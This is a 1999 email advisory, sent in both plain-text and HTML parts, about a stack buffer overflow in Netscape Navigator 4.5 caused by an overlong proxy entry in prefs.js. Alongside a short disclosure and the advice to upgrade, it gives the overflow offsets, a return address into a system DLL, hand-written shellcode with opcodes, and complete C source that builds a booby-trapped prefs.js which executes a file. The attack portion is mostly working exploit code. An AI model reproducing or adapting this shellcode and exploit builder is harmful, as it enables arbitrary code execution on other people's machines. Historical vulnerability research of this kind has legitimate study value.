This is a multi-part message in MIME format. ------=_NextPart_000_0017_01BF4C70.00D57320 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Netscape Navigator/Communicator 4.5 buffer overflow advisory -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D Author: Steve Fewer, darkplan@oceanfree.net http://indigo.ie/~lmf -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D Introduction: I recently uncovered a stack based buffer overflow in NN which allowed me to execute arbitrary code. It is a local Attack where the offending party is the users 'prefs.js' file, usually stored in c:\program files\netscape\users\*** where *** is a user. It occurs when NN reads in an entry greater than 80 bytes in the network.proxy.http field. Netscape have been notified of this problem. E.g. user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB CCCC"); The EBP is overrun at bytes 81 - 84 and the EIP is overrun at bytes 85 - 89, from there on your code can be placed. The first 80 bytes get blown away when you smash the stack but you are left with a possible 500 bytes or more for your exploit code, (500 was the most I checked). You're first byte of code is pointed to by the ESP. To concoct an exploit for this to see if it was actually exploitable I pointed my EIP into a 'JMP ESP' located at 7FD035EB in shell32.dll (v4.72.3110.6) which NN loads. Having got back to my exploit buffer I simply made it execute a file called app.exe, which should be located in \windows\command\ and then made it call exit() to tidy up so we don't cause an access violation, obviously there is room for a more insidious exploit but I don't view this as an enormously dangerous security flaw so it didn't warrant writing anything more sophisticated. For protection you could try the latest version of NN which is 4.7. This was all created/tested on Windows98 running on an Intel PII400 with 128MB RAM. The Shell Code: This is the assembly which runs a file app.exe and then calls exit() to clean up. The op codes are to the right. I called system() at address 78019824 in msvcrt.dll v6.00.8397.0 to run app.exe and exit() at address 78005504 in the same DLL to tidy up. mov esp,ebp // 8BE5 push ebp // 55 mov ebp,esp // 8BEC xor edi,edi // 33FF push edi // 57 sub esp,04h // 83EC04 mov byte ptr [ebp-08h],61h // C645F861 mov byte ptr [ebp-07h],70h // C645F970 mov byte ptr [ebp-06h],70h // C645FA70 mov byte ptr [ebp-05h],2Eh // C645FB2E mov byte ptr [ebp-04h],65h // C645FC65 mov byte ptr [ebp-03h],78h // C645FD78 mov byte ptr [ebp-02h],65h // C645FE65 mov eax, 0x78019824 // B824980178 push eax // 50 lea eax,[ebp-08h] // 8D45F8 push eax // 50 call dword ptr[ebp-0ch] // FF55F4 push ebp // 55 mov ebp,esp // 8BEC mov edx,0xFFFFFFFF // BAFFFFFFFF sub edx,0x87FFAAFB // 81EAFBAAFF87 push edx // 52 xor eax,eax // 33C0 push eax // 50 call dword ptr[ebp-04h] // FF55FC The Exploit: <-snip-> /* Stack based buffer overflow exploit for Netscape Navigator 4.5 * Author Steve Fewer, 22-12-99. Mail me at darkplan@oceanfree.net * * Netscape Navigator causes a buffer overflow when reading from * the users "prefs.js" file. If it reads a string longer than 80 * bytes in the user_pref("network.proxy.http", "proxy.com"); * field it smashes the stack overwrighting the EIP and EBP. This * can be used to execute arbitrary code. * * Tested with Netscape Navigator 4.5 using Windows98 on an Intel * PII 400 with 128MB RAM * * http://indigo.ie/~lmf */ #include <stdio.h> #include <string.h> int main() { printf("\n\n\t\t........................................\n"); printf("\t\t.....Netscape Navigator 4.5 exploit.....\n"); printf("\t\t........................................\n"); printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n"); printf("\t\t.........http://indigo.ie/~lmf..........\n"); printf("\t\t........................................\n\n"); // the first 80 bytes. These get blown away when the stack goes = down. char buff[96]; // the EBP, we don't need to use it so fill it with B's char ebp[8] =3D "BBBB"; // we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP = ESP @ 7FD035EB char eip[8] =3D "\xEB\x35\xD0\x7F"; // the is our 'arbitrary code', it just runs a file app.exe from the = \WINDOWS\COMMAND directory then calls exit() to clean up char sploit[128] =3D = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6= \x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\= x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\x= FF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *file; for(int i=3D0;i<80;i++) { buff[i] =3D 0x90; } // just create our new, 'trojand' prefs.js file file =3D fopen("prefs.js","wb"); // and slap in the the nasty sploit fprintf(file,"user_pref(\"network.proxy.http\", \"%s%s%s%s\");", = buff, ebp, eip, sploit); printf("\t created file prefs.js loaded with the exploit.\n"); return 0; } <-snip-> -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D ------=_NextPart_000_0017_01BF4C70.00D57320 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>Netscape=20 Navigator/Communicator 4.5 buffer overflow=20 advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20 Steve Fewer, <A=20 href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs= p;  = ; =20 <A=20 href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial=20 size=3D2>Introduction:</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>I recently = uncovered a=20 stack based buffer overflow in NN<BR>which allowed me to execute = arbitrary code.=20 It is a local<BR>Attack where the offending party is the users=20 'prefs.js'<BR>file, usually stored in c:\program=20 files\netscape\users\***<BR>where *** is a user. It occurs when NN reads = in an=20 entry<BR>greater than 80 bytes in the network.proxy.http = field.<BR>Netscape have=20 been notified of this problem.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial = size=3D2>E.g.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial=20 size=3D2>user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAA<BR>AA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB<BR>CCCC");</FONT= ></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>The EBP is = overrun at bytes=20 81 - 84 and the EIP is overrun<BR>at bytes 85 - 89, from there on your = code can=20 be placed.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>The first = 80 bytes get=20 blown away when you smash the stack<BR>but you are left with a possible = 500=20 bytes or more for your<BR>exploit code, (500 was the most I checked). = You're=20 first byte<BR>of code is pointed to by the ESP.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>To concoct = an exploit for=20 this to see if it was actually<BR>exploitable I pointed my EIP into a = 'JMP ESP'=20 located at<BR>7FD035EB in shell32.dll (v4.72.3110.6) which NN = loads.<BR>Having=20 got back to my exploit buffer I simply made it<BR>execute a file called = app.exe,=20 which should be located in<BR>\windows\command\ and then made it call = exit() to=20 tidy up<BR>so we don't cause an access violation, obviously there = is<BR>room for=20 a more insidious exploit but I don't view this as<BR>an enormously = dangerous=20 security flaw so it didn't warrant<BR>writing anything more=20 sophisticated.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>For = protection you could=20 try the latest version of NN which<BR>is 4.7.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>This was = all created/tested=20 on Windows98 running on an Intel<BR>PII400 with 128MB = RAM.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2><BR>The = Shell=20 Code:</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>This is the = assembly which=20 runs a file app.exe and then<BR>calls exit() to clean up. The op codes = are to=20 the right.<BR>I called system() at address 78019824 in=20 msvcrt.dll<BR>v6.00.8397.0 to run app.exe and exit() at address = 78005504<BR>in=20 the same DLL to tidy up.</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial = size=3D2> mov=20 esp,ebp = &= nbsp;=20 // 8BE5<BR> push=20 ebp &nbs= p;  = ; =20 // 55<BR> mov=20 ebp,esp = &= nbsp;=20 // 8BEC<BR> xor=20 edi,edi = &= nbsp;=20 // 33FF<BR> push=20 edi &nbs= p;  = ; =20 // 57<BR> sub=20 esp,04h = &= nbsp;=20 // 83EC04<BR> mov byte ptr=20 [ebp-08h],61h //=20 C645F861<BR> mov byte ptr=20 [ebp-07h],70h //=20 C645F970<BR> mov byte ptr=20 [ebp-06h],70h //=20 C645FA70<BR> mov byte ptr=20 [ebp-05h],2Eh //=20 C645FB2E<BR> mov byte ptr=20 [ebp-04h],65h //=20 C645FC65<BR> mov byte ptr=20 [ebp-03h],78h //=20 C645FD78<BR> mov byte ptr=20 [ebp-02h],65h //=20 C645FE65<BR> mov eax,=20 0x78019824 &nb= sp; =20 // B824980178<BR> push=20 eax &nbs= p;  = ; =20 // 50<BR> lea=20 eax,[ebp-08h] = =20 // 8D45F8<BR> push=20 eax &nbs= p;  = ; =20 // 50<BR> call dword=20 ptr[ebp-0ch] &= nbsp; =20 // FF55F4<BR> push=20 ebp &nbs= p;  = ; =20 // 55<BR> mov=20 ebp,esp = &= nbsp;=20 // 8BEC<BR> mov=20 edx,0xFFFFFFFF  = ; =20 // BAFFFFFFFF<BR> sub=20 edx,0x87FFAAFB  = ; =20 // 81EAFBAAFF87<BR> push=20 edx &nbs= p;  = ; =20 // 52<BR> xor=20 eax,eax = &= nbsp;=20 // 33C0<BR> push=20 eax &nbs= p;  = ; =20 // 50<BR> call dword=20 ptr[ebp-04h] &= nbsp; =20 // FF55FC</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2><BR>The=20 Exploit:</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial=20 size=3D2><-snip-></FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>/* Stack = based buffer=20 overflow exploit for Netscape Navigator 4.5<BR> * Author Steve = Fewer,=20 22-12-99. Mail me at <A=20 href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs= p;*<BR> *=20 Netscape Navigator causes a buffer overflow when reading from<BR> * = the=20 users "prefs.js" file. If it reads a string longer than 80<BR> * = bytes in=20 the user_pref("network.proxy.http", "proxy.com");<BR> * field it = smashes=20 the stack overwrighting the EIP and EBP. This<BR> * can be used to = execute=20 arbitrary code.<BR> *<BR> * Tested with Netscape Navigator 4.5 = using=20 Windows98 on an Intel<BR> * PII 400 with 128MB = RAM<BR> *<BR> * <A=20 href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR> */</FON= T></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>#include=20 <stdio.h><BR>#include <string.h></FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>int=20 main()<BR>{</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial = size=3D2> =20 printf("\n\n\t\t........................................\n");<BR> &n= bsp; =20 printf("\t\t.....Netscape Navigator 4.5 = exploit.....\n");<BR> =20 printf("\t\t........................................\n");<BR> = =20 printf("\t\t.....Author: Steve Fewer, = 22-12-1999....\n");<BR> =20 printf("\t\t.........http://indigo.ie/~lmf..........\n");<BR> = =20 printf("\t\t........................................\n\n");</FONT></FONT>= </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial = size=3D2> // the=20 first 80 bytes. These get blown away when the stack goes=20 down.<BR> char buff[96];<BR> // the = EBP, we=20 don't need to use it so fill it with B's<BR> char = ebp[8] =3D=20 "BBBB";<BR> // we point the EIP into msvcrt.dll = v6.00.8397.0=20 where we find a JMP ESP @ 7FD035EB<BR> char eip[8] =3D = "\xEB\x35\xD0\x7F";<BR> // the is our 'arbitrary = code', it=20 just runs a file app.exe from the \WINDOWS\COMMAND directory then calls = exit()=20 to clean up<BR> char sploit[128] =3D=20 "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6= \x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\= x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\x= FF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";<BR>&= nbsp; =20 FILE *file;<BR> for(int=20 i=3D0;i<80;i++)<BR> =20 {<BR> buff[i] =3D=20 0x90;<BR> = }<BR> //=20 just create our new, 'trojand' prefs.js file<BR> file = =3D=20 fopen("prefs.js","wb");<BR> // and slap in the the = nasty=20 sploit<BR> = fprintf(file,"user_pref(\"network.proxy.http\",=20 \"%s%s%s%s\");", buff, ebp, eip, sploit);</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial = size=3D2> =20 printf("\t created file prefs.js loaded with the = exploit.\n");</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial size=3D2>return=20 0;<BR>}</FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial=20 size=3D2><-snip-></FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><FONT face=3DArial=20 size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D</FONT></FONT></DIV><= /BODY></HTML> ------=_NextPart_000_0017_01BF4C70.00D57320--